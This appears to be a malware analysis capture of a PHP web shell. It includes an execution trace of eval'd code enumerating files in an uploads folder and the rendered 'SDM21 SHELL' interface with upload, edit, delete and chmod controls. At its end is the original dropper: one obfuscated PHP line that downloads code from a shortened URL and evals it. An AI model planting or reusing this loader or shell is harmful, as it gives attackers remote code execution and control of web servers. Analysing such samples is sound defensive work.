3		A						/var/www/html/uploads/403.php(1) : eval()'d code	350	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	353	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	356	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	357	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	360	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	363	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	364	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	367	$info .= '-'
3	39	1	0.201434	483448
3	39	R			'-rw-r--r--'
3	41	0	0.201448	483408	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/.htaccess'
3	41	1	0.201463	483448
3	41	R			FALSE
3	42	0	0.201476	483408	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/.htaccess'
3	42	1	0.201491	483448
3	42	R			TRUE
3	43	0	0.201504	483408	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/403.php'
3	43	1	0.201519	483448
3	43	R			TRUE
3	44	0	0.201532	483408	filesize	0		/var/www/html/uploads/403.php(1) : eval()'d code	281	1	'/var/www/html/uploads/403.php'
3	44	1	0.201545	483448
3	44	R			127
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	281	$size = 0.1240234375
3	45	0	0.201568	483312	round	0		/var/www/html/uploads/403.php(1) : eval()'d code	282	2	0.1240234375	3
3	45	1	0.201582	483384
3	45	R			0.124
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	282	$size = 0.124
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	286	$size = '0.124 KB'
3	46	0	0.201623	483408	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	293	1	'/var/www/html/uploads/403.php'
3	46	1	0.201639	483448
3	46	R			FALSE
3	47	0	0.201652	483408	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	294	1	'/var/www/html/uploads/403.php'
3	47	1	0.201667	483448
3	47	R			TRUE
3	48	0	0.201680	483408	perms	1		/var/www/html/uploads/403.php(1) : eval()'d code	295	1	'/var/www/html/uploads/403.php'
4	49	0	0.201693	483408	fileperms	0		/var/www/html/uploads/403.php(1) : eval()'d code	320	1	'/var/www/html/uploads/403.php'
4	49	1	0.201706	483448
4	49	R			33204
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	320	$perms = 33204
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	330	$info = '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	349	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	350	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	353	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	356	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	357	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	360	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	363	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	364	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	367	$info .= '-'
3	48	1	0.201829	483448
3	48	R			'-rw-rw-r--'
3	50	0	0.201843	483408	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/403.php'
3	50	1	0.201859	483448
3	50	R			FALSE
3	51	0	0.201872	483408	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/403.php'
3	51	1	0.201887	483448
3	51	R			TRUE
3	52	0	0.202037	483408	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/data'
3	52	1	0.202054	483448
3	52	R			FALSE
3	53	0	0.202068	483416	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/prepend.php'
3	53	1	0.202083	483464
3	53	R			TRUE
3	54	0	0.202096	483424	filesize	0		/var/www/html/uploads/403.php(1) : eval()'d code	281	1	'/var/www/html/uploads/prepend.php'
3	54	1	0.202110	483464
3	54	R			57
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	281	$size = 0.0556640625
3	55	0	0.202134	483320	round	0		/var/www/html/uploads/403.php(1) : eval()'d code	282	2	0.0556640625	3
3	55	1	0.202148	483392
3	55	R			0.056
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	282	$size = 0.056
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	286	$size = '0.056 KB'
3	56	0	0.202185	483424	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	293	1	'/var/www/html/uploads/prepend.php'
3	56	1	0.202201	483464
3	56	R			FALSE
3	57	0	0.202214	483424	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	294	1	'/var/www/html/uploads/prepend.php'
3	57	1	0.202230	483464
3	57	R			TRUE
3	58	0	0.202243	483424	perms	1		/var/www/html/uploads/403.php(1) : eval()'d code	295	1	'/var/www/html/uploads/prepend.php'
4	59	0	0.202256	483424	fileperms	0		/var/www/html/uploads/403.php(1) : eval()'d code	320	1	'/var/www/html/uploads/prepend.php'
4	59	1	0.202270	483464
4	59	R			33261
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	320	$perms = 33261
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	330	$info = '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	349	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	350	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	353	$info .= 'x'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	356	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	357	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	360	$info .= 'x'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	363	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	364	$info .= '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	367	$info .= 'x'
3	58	1	0.202398	483464
3	58	R			'-rwxr-xr-x'
3	60	0	0.202412	483424	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/prepend.php'
3	60	1	0.202429	483464
3	60	R			FALSE
3	61	0	0.202442	483424	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	296	1	'/var/www/html/uploads/prepend.php'
3	61	1	0.202457	483464
3	61	R			TRUE
2	5	1	0.202472	483360
1	3	1	0.202484	427184
			0.202514	346312
TRACE END   [2023-02-13 02:26:12.105809]


Generated HTML code

<html><head>
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link rel="icon" type="image/jpg" href="https://i.ibb.co/M1JCKDN/images-jpeg.jpg">
<title></title>
</head><body><center>

<style type="text/css">
body {
	font-family: Kelly Slab;
	background-color: black;
	color: white;
	}
#content tr:hover{
	background-color: #0200FF;
	text-shadow:0px 0px 10px #339900;
	}
#content .first{
	color: #000000;
	background-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);
	}
#content .first:hover{
	background-color: grey;
	text-shadow:0px 0px 1px #339900;
	}
table, th, td {
		border-collapse:collapse;
		padding: 5px;
		color: white;
		}
.table_home, .th_home, .td_home { 
		color:grey;
		border: 2px solid grey;
		padding: 7px;
		}
a{
	font-size: 19px;
	color: #ffffff;
	text-decoration: none;
	}
a:hover{
	color: white;
	text-shadow:0px 0px 10px #339900;
	}
input,select,textarea{
	border: 1px #ffffff solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
	border-radius:5px;
	}
.close {
	overflow: auto;
	border: 1px solid red;
	background: red;
	color: white;
	}
.r {
	float: right;
	text-align: right;
	}
</style>

<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">
SDM21 SHELL</h1></a>



<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tbody><tr><td></td></tr><tr><td><font color="white">
<i class="fa fa-user"></i> </font></td><td>: <font color="lime">::1</font></td></tr><tr><td><font color="white">
<i class="fa fa-desktop"></i> </font></td><td>: <font color="lime">127.0.0.1 / localhost</font></td></tr><tr><td><font color="white">
<i class="fa fa-hdd-o"></i> </font></td><td>: <font color="lime">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font></td></tr></tbody></table><table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">
<tbody><tr align="center"><td align="center"><br><i class="fa fa-folder-o"></i> : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/<br><br><br><font color="yellow"></font><form enctype="multipart/form-data" method="POST"><font color="yellow">
Upload File: <input type="file" name="file" style="color:cyan;border:2px solid red;" required=""></font>
<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: yellow;border:2px solid red;border-radius:5px"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Perm</center></th>
<th><center>Options</center></th>
</tr>
<tr></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/403.php&amp;path=/var/www/html"> 403.php</a></td>
<td class="td_home"><center>0.124 KB</center></td>
<td class="td_home"><center>-rw-rw-r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">SDM Hapus</option>
<option value="edit">SDM Edit</option>
<option value="rename">SDM Ganti Nama</option>
<option value="chmod">SDM Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="403.php">
<input type="hidden" name="path" value="/var/www/html/403.php">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html"> beneri.se_malware_analysis</a></td>
<td class="td_home"><center>0 KB</center></td>
<td class="td_home"><center>-rw-r--r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&amp;path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">SDM Hapus</option>
<option value="edit">SDM Edit</option>
<option value="rename">SDM Ganti Nama</option>
<option value="chmod">SDM Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr></tbody></table>
</div><center>
<br>
<font size="2px" color="white">Copyright © <script type="text/javascript">var creditsyear = new Date();document.write(creditsyear.getFullYear()); </script>2023 SDM21. All Right Reserved.</font>
</center>

</center></body></html>

Original PHP code

 <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://bit.ly/3iLHOKD"));/**/?>